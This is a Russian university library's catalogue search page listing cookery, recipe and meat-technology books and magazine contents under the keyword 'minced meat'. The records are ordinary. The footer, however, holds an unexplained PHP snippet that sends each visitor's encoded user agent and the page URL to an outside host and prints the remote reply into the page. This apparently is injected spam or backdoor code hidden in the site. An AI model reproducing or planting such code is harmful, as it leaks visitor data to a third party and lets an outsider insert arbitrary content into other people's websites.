Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

248 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ФАРШ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 24
1. 
Косой, Валентин Данилович. Инженерная реология биотехнологических сред [Текст] / В. Д. Косой, Я. И. Виноградов, А. Д. Малышев ; дар. В. В. Арсеньев, 2005. - 642, [2] с.
Держатели документа (Информация об экземплярах) 

В учебнике представлены основные положения реологии, обоснованы пути и практические решения ряда задач обработки сырья и продукции животного происхождения методами инженерной реологии. Особое внимание уделено рассмотрению инструментальных методов измерений реологических параметров, влиянию технологических и механических факторов на поведение продукта в процессе обработки, что оценивается изменениями его реологических свойств.

Учебник предназначен для студентов, обучающихся по направлению "Технология сырья и продуктов животного происхождения", а также может быть использован специалистами отрасли.

2. 
Позняковский, Валерий Михайлович. Экспертиза мяса и мясопродуктов. Качество и безопасность [Текст] / В. М. Позняковский ; дар. О. Д. Худякова, 2007. - 526 с.
Держатели документа (Информация об экземплярах) 

Пособие входит в серию "Экспертиза пищевых продуктов и продовольственного сырья". В книге впервые собран и наиболее полно представлен в систематизированном виде учебно-справочный материал по вопросам качества, безопасности и экспертизе мяса и мясопродуктов, включая свежее мясо и продукты из говядины, свинины, баранины, конины, оленины.

В основных разделах книги по данной группе пищевых продуктов рассматриваются следующие вопросы: классификация, термины и определения, технология производства, пищевая ценность, требования к качеству, упаковка, маркировка и хранение.

Пособие предназначено для студентов вузов, обучающихся по специальности "Товароведение и экспертиза товаров". Может быть полезно студентам технических, технологических и медицинских вузов, изучающих дисциплины, связанные с вопросами качества и безопасности продуктов питания. Представляет практический интерес для производителей, коммерсантов, экспертов, научных работников и широкого круга потребителей.

3. 
Богушева, Валентина Ивановна. Технология приготовления пищи [Текст] / В. И. Богушева, 2010. - 374, [1] с.
Держатели документа (Информация об экземплярах) 

В пособии представлен весь комплекс теоретических основ производства продукции общественного питания.

Дана характеристика химического состава и физических свойств различных продуктов. Рассмотрены основные способы и приемы первичной обработки сырья и приготовления полуфабрикатов. Характеризуются приемы тепловой обработки, а также изменения, происходящие в продуктах под влиянием высоких температур.

Основная часть пособия посвящена технологии приготовления кулинарных блюд, правилам их оформления и подачи.

Особое внимание обращается на требования, предъявляемые к качеству продукции общественного питания, срокам ее хранения и реализации.

В последних главах освещаются вопросы лечебного и детского питания, дается характеристика различных диет.

Предназначено для студентов технологических, торгово-экономических, кооперативных колледжей и техникумов. Он может представлять интерес и для практических работников, обучающихся в системе переподготовки кадров и повышения квалификации.

4. 
Сборник рецептур блюд и кулинарных изделий для предприятий общественного питания [Текст] / сост.: Л. Е. Голунова, М. Т. Лабзина, 2014. - 771 с.
Ключевые слова 
БУТЕРБРОД -- ЗАКУСКА БАНКЕТНАЯ -- САЛАТ -- ВИНЕГРЕТ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СОЛЯНКА -- СУП МОЛОЧНЫЙ -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- КАША -- ЗАПЕКАНКА -- ПУДИНГ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МЯСНЫЕ -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- ЯГОДЫ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- САМБУК -- КРЕМ -- СЛИВКИ ВЗБИТЫЕ -- СУФЛЕ -- ПУДИНГ -- МОРОЖЕНОЕ -- НАПИТКИ -- ЧАЙ -- КОФЕ -- КАКАО -- ШОКОЛАД -- МОЛОКО -- КОКТЕЙЛЬ -- КРЮШОН -- БЛЮДА МУЧНЫЕ -- ФАРШ -- РАСХОД СЫРЬЯ -- ПОЛУФАБРИКАТЫ -- ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ
Держатели документа (Информация об экземплярах) 
5. 
Кулинария [Текст] / П. В. Абатуров [и др.] ; дар. В. С. Михайленко, 1955. - 959, [1] с.
Держатели документа (Информация об экземплярах) 
6. 
Бутейкис, Нина Григорьевна. Технология приготовления мучных кондитерских изделий [Текст] / Н. Г. Бутейкис ; дар. В. В. Арсеньев, 2009. - 300, [1] с.
Держатели документа (Информация об экземплярах) 

Приведены сведения о сырье, предназначенном для изготовления хлебобулочных и кондитерских изделий, фаршей, кремов и различных полуфабрикатов, его подготовке и рациональном использовании, а также об изготовлении полуфабрикатов и готовых изделий и их отделке. Рассмотрена технология приготовления разнообразных хлебобулочных и кондитерских изделий, фаршей, кремов и полуфабрикатов, в том числе фирменных изделий из разных видов теста на предприятиях общественного питания.

В 7-е издание внесены изменения и дополнения, касающиеся использования в кондитерском производстве новых видов сырья и технологий новых изделий, по состояниию на 1 апреля 2008 г.

Для учащихся образовательных учреждений начального профессионального образования.

7. 
Вестник Астраханского государственного технического университета. - Журнал, 2011г. № 1
Оглавление 
Держатели документа (Информация об экземплярах) 
Полный текст
8. 
Огонек. - Журнал, 2007г. № 16
Оглавление 
  • Оглоблина, Юлия. Дети Лукашенко / Ю. Оглоблина. - с.3
  • Бельченко, Всеволод. Дружить домами / В. Бельченко. - с.4
  • Гениева, Екатерина. Колыбельная для Воннегута / Е. Гениева. - с.5
  • Раков, Юрий. Из "Клаба" - в парламент? / Ю. Раков. - с.8
  • Лысаков, Вячеслав. Мигалки, следующий - Лужков? / В. Лысаков. - с.10
  • Быков, Дмитрий. Шагом фарш / Д. Быков. - с.12-13
  • Журенков, Кирилл. Бразильский карнавал / К. Журенков. - с.14-16
  • Овчинский, Владимир. Рейдеромафия / В. Овчинский. - с.18-21
  • Любимов, Юрий. Утонченный захват / Ю. Любимов. - с.24-25
  • Мадлен, Филипп. Французский колпак / Ф. Мадлен. - с.26-27
  • Мейсон, Тони. "Моряки непозволительно расслабились" / Т. Мейсон. - с.28-29
  • Цыпин, Алексей. Праздник ядерного непослушания / А. Цыпин. - с.30
  • Мильман, Золик. Смерть в песочнице / З. Мильман. - с.34-36
  • Фаизова, Анна. Экономика скуки / А. Фаизова. - с.37-39
  • Губин, Дмитрий. Последний непокой / Д. Губин. - с.40-41
  • Кудрявцева, Елена. Беспечный едок / Е. Кудрявцева. - с.42-44
  • Гинзбург, Михаил. Сеанс диеты с последующим разоблачением / М. Гинзбург. - с.44
  • Якушев, Федор. Равнение на аборт / Ф. Якушев. - с.46-47
  • Денисова, Саша. Личная жизнь Бориса Годунова / С. Денисова. - с.48-51
  • Шнуров, Сергей. День Шнура / С. Шнуров. - с.52-54
  • Лысенко, Анатолий. Телевизионная фабрика-кухня / А. Лысенко. - с.55
  • Клавихо-Телепнев, Владимир. Высотка Дракулы / В. Клавихо-Телепнев. - с.57
  • Веллер, Михаил. Благородные доны советской литературы / М. Веллер. - с.58-59
  • Бельченко, Всеволод. Пиццу заказывали? / В. Бельченко. - с.60
  • Рейдерский набег. - с.22-23
Держатели документа (Информация об экземплярах) 
9. 
Вокруг света. - Журнал, 2010г. № 11
Оглавление 
  • Звездно-полосатый форт. - с.264
  • Выбираем. - с.256-262
  • Рогачев, Сергей. Визитная карточка региона / С. Рогачев. - с.254
  • Сухова, Надежда. Великое дао скромного боба / Н. Сухова, И. Шамсутдинов. - с.246-252
  • Здоровый интерес. - с.244-245
  • Жуков, Борис. Лечение ничем / Б. Жуков. - с.232-243
  • Воробьев-Обухов, Алексей. Жертвы на алтарь безопасности / А. Воробьев-Обухов. - с.224-230
  • Сергеев, Александр. Луноход. Эпизод первый / А. Сергеев. - с.214-222
  • Максимов, Никита. Шаг вперед - два шага вниз / Н. Максимов. - с.208-213
  • Козловский, Борислав. Скелеты умерших идей / Б. Козловский. - с.196-206
  • Шубинский, Валерий. Пять жизней Ивана Павловича / В. Шубинский. - с.183-195
  • Котов, Павел. Как Иисус стал Бодхисатвой / П. Котов. - с.172-181
  • Иванов, Сергей. Огненный удар Везувия / С. Иванов. - с.168-170
  • Цветков, Алексей. Операция "Фарш": как все это было / А. Цветков. - с.160-166
  • Быковский, Егор. Шестьдесят восемь часов на знакомство с Америкой / Е. Быковский. - с.140-147
  • Травина, Ирина. Глубинная цивилизация / И. Травина. - с.150-158
  • Завадский, Марк. Земноводный мегаполис / М. Завадский. - с.128-138
  • Жуков, Борис. Эдем на дне котла / Б. Жуков. - с.120-126
  • Ястржембский, Сергей. Кровь и красота / С. Ястржембский. - с.108-118
  • Виноградова, Елена. Богатство на бобах / Е. Виноградова. - с.96-106
  • Алексеев-Рыбин, Николай. Африка в пришедшем времени / Н. Алексеев-Рыбин. - с.64-92
  • Губарева, Марита. Площадь Испании. Жизнь нараспашку / М. Губарева. - с.56-62
  • Шубинский, Валерий. Попытка расшифровки / В. Шубинский. - с.52
  • Висенс, Елена. Четвероногий королевский балет / Е. Висенс. - с.48-50
  • Леонов, Сергей. Швейная машинка Singer / С. Леонов. - с.46
  • Иванов, Сергей. Мустафа Кемаль Ататюрк / С. Иванов. - с.42-44
  • Почему у индийских богов много рук?. - с.40
  • Почему иудеи и мусульмане не едят свинину?. - с.40
  • Сколько золота в золотой олимпийской медали?. - с.38
  • Кто придумал конфеты "Птичье молоко" и почему они так называются?. - с.38
  • Терещенко, Алексей. 1960 ноябрь / А. Терещенко. - с.36
  • Терещенко, Алексей. 1860 ноябрь / А. Терещенко. - с.32
  • Терещенко, Алексей. 1910 ноябрь / А. Терещенко. - с.34
  • Терещенко, Алексей. 1510 ноябрь / А. Терещенко. - с.30
  • Терещенко, Алексей. 1260 ноябрь / А. Терещенко. - с.28
  • Идеи и открытия. - с.24-26
  • Котов, Павел. Фламандская "доска" на границе двух миров / П. Котов. - с.18-22
  • Пестрый мир. - с.12-16
10. 
Сборник рецептур блюд и кулинарных изделий для предприятий общественного питания [Текст] / сост. Л. Е. Голунова, 2001. - 688 с.
Ключевые слова 
БУТЕРБРОД -- ЗАКУСКА БАНКЕТНАЯ -- САЛАТ -- ВИНЕГРЕТ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СОЛЯНКА -- СУП МОЛОЧНЫЙ -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- КАША -- ЗАПЕКАНКА -- ПУДИНГ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МЯСНЫЕ -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- ЯГОДЫ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- САМБУК -- КРЕМ -- СЛИВКИ ВЗБИТЫЕ -- СУФЛЕ -- ПУДИНГ -- МОРОЖЕНОЕ -- НАПИТКИ -- ЧАЙ -- КОФЕ -- КАКАО -- ШОКОЛАД -- МОЛОКО -- КОКТЕЙЛЬ -- КРЮШОН -- БЛЮДА МУЧНЫЕ -- ФАРШ -- РАСХОД СЫРЬЯ -- ПОЛУФАБРИКАТЫ -- ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ
Держатели документа (Информация об экземплярах) 
11. 
Барановский В. А. Кондитер [Текст] : учеб. пособие для уч-ся колледжей и сред. проф.-тех. училищ / В. А. Барановский, 2000. - 318 с.
Держатели документа (Информация об экземплярах) 
12. 
Барановский В. А. Кондитер [Текст] : Учеб. пособие для уч-ся проф. лицеев и училищ / В. А. Барановский, Т. И. Перетятко, 2003. - 381 с.
Держатели документа (Информация об экземплярах) 
13. 
Мазепа Е. В. Практикум для кондитера [Текст] : Учеб. пособие / Е. В. Мазепа, 2002. - 372,[2] с.
Держатели документа (Информация об экземплярах) 
14. 
Современная киргизская кухня [Текст] : сб. рецептур / сост. С. Ш. Ибрагимова, 1991. - 222, [2] с.
15. 
Кенгис, Роберт Петрович. Изделия из теста [Текст] / Р. П. Кенгис, 1958. - 192 с.
Держатели документа (Информация об экземплярах) 
16. 
Барановский В. А. Рецептурный справочник повара [Текст] : справочное издание / В. А. Барановский, 2003. - 379 с.
Ключевые слова 
ОБРАБОТКА ПРОДУКТОВ -- БЕЛКИ -- ЖИРЫ -- УГЛЕВОДЫ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА КРОЛИКОВ -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКА -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ дичи -- БЛЮДА ИЗ кролика -- СОУС -- БЛЮДА СЛАДКИЕ -- ТЕСТО -- ФАРШ
Держатели документа (Информация об экземплярах) 
17. 
Сборник рецептур национальных блюд и кулинарных изделий [Текст] : для предприятий общественного питания всех форм собственности / сост. Е. В. Данилевская, 2002. - 831 с.
Ключевые слова 
КУХНЯ УКРАИНСКАЯ -- КУХНЯ НАРОДОВ РФ -- КУХНЯ БЕЛОРУССКАЯ -- КУХНЯ молдавская -- КУХНЯ эстонская -- КУХНЯ литовская -- КУХНЯ ЛАТЫШСКАЯ -- КУХНЯ ГРУЗИНСКАЯ -- КУХНЯ АРМЯНСКАЯ -- КУХНЯ АЗЕРБАЙДЖАНСКАЯ -- КУХНЯ УЗБЕКСКАЯ -- КУХНЯ КАЗАХСКАЯ -- КУХНЯ туркменская -- КУХНЯ киргизская -- КУХНЯ таджикская -- БЛЮДА ХОЛОДНЫЕ -- САЛАТ -- ЗАКУСКИ -- СУП -- КВАС -- Борщ -- Похлебки -- БЛЮДА ИЗ картофеля -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ КРОЛИКА -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- БЛЮДА ИЗ МУКИ -- ВАРЕНИКИ -- БЛИНЫ -- ФАРШ -- ИЗДЕЛИЯ МУЧНЫЕ
Держатели документа (Информация об экземплярах) 
18. 
Шестакова Т. И. Кондитер-профессионал [Текст] : учеб. пособие / Т. И. Шестакова, 2006. - 399 с.
Ключевые слова 
МУКА ПШЕНИЧНАЯ -- МУКА СОЕВАЯ -- МУКА кукурузная -- КРАХМАЛ -- глюкоза -- фруктоза -- ПОДСЛАСТИТЕЛЬ -- патока крахмальная -- МЕД -- МОЛОКО -- ПРОДУКТЫ МОЛОЧНЫЕ -- МАСЛО СЛИВОЧНОЕ -- ЖИРЫ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- ПРОДУКТЫ ВКУСОВЫЕ -- КИСЛОТА ПИЩЕВАЯ -- ВЕЩЕСТВА АРОМАТИЧЕСКИЕ -- РАЗРЫХЛИТЕЛЬ -- ФРУКТЫ -- ЦУКАТЫ -- КРУПА -- ОРЕХИ -- МАК -- УЛУЧШИТЕЛЬ хлебобулочных изделий -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА -- СЛИВКИ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ФАРШ -- ТЕСТО дрожжевое -- КУЛИЧИ -- БАБА РОМОВАЯ -- ТЕСТО бездрожжевое -- ВАТРУШКА -- ТЕСТО ПРЯНИЧНОЕ -- ТЕСТО ПЕСОЧНОЕ -- БИСКВИТ -- ТЕСТО ЗАВАРНОЕ -- ТЕСТО СЛОЕНОЕ -- волованы -- ФРИТЮР -- ПЕЧЕНЬЕ -- КЕКС -- ПИЦЦА -- СЛАДОСТИ ВОСТОЧНЫЕ -- СИРОП -- помадка -- ГЛАЗУРИ -- мастика -- КАРАМЕЛЬ -- кандир для сахарных фигур -- грильяж -- ЖЕЛЕ -- марципан -- ШОКОЛАД -- посыпки -- КРЕМ -- ПИРОЖНЫЕ -- ТОРТЫ
Держатели документа (Информация об экземплярах) 
19. 
Кулинарные зарисовки о здоровом питании [Текст] : сборник / авт.-сост.: Г. В. Иванова, Л. Г. Макарова, И. Н. Пушмина и др., 2007. - 567 с.
Держатели документа (Информация об экземплярах) 
20. 
Сборник рецептур национальных блюд и кулинарных изделий [Текст] : для предприятий общественного питания всех форм собственности / сост. Е. В. Данилевская, 2003. - 831 с.
Ключевые слова 
КУХНЯ УКРАИНСКАЯ -- КУХНЯ НАРОДОВ РФ -- КУХНЯ БЕЛОРУССКАЯ -- КУХНЯ молдавская -- КУХНЯ эстонская -- КУХНЯ литовская -- КУХНЯ ЛАТЫШСКАЯ -- КУХНЯ ГРУЗИНСКАЯ -- КУХНЯ АРМЯНСКАЯ -- КУХНЯ АЗЕРБАЙДЖАНСКАЯ -- КУХНЯ УЗБЕКСКАЯ -- КУХНЯ КАЗАХСКАЯ -- КУХНЯ туркменская -- КУХНЯ киргизская -- КУХНЯ таджикская -- БЛЮДА ХОЛОДНЫЕ -- САЛАТ -- ЗАКУСКИ -- СУП -- КВАС -- Борщ -- Похлебки -- БЛЮДА ИЗ картофеля -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ КРОЛИКА -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- БЛЮДА ИЗ МУКИ -- ВАРЕНИКИ -- БЛИНЫ -- ФАРШ -- ИЗДЕЛИЯ МУЧНЫЕ
Держатели документа (Информация об экземплярах) 
21. 
Сборник рецептур блюд и кулинарных изделий [Текст] : Норматив. док. для предприятий обществ. питания / А. В. Румянцев, 1998. - 863 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2928 - 16.06.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.10 с.18 запросов, 0.65c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;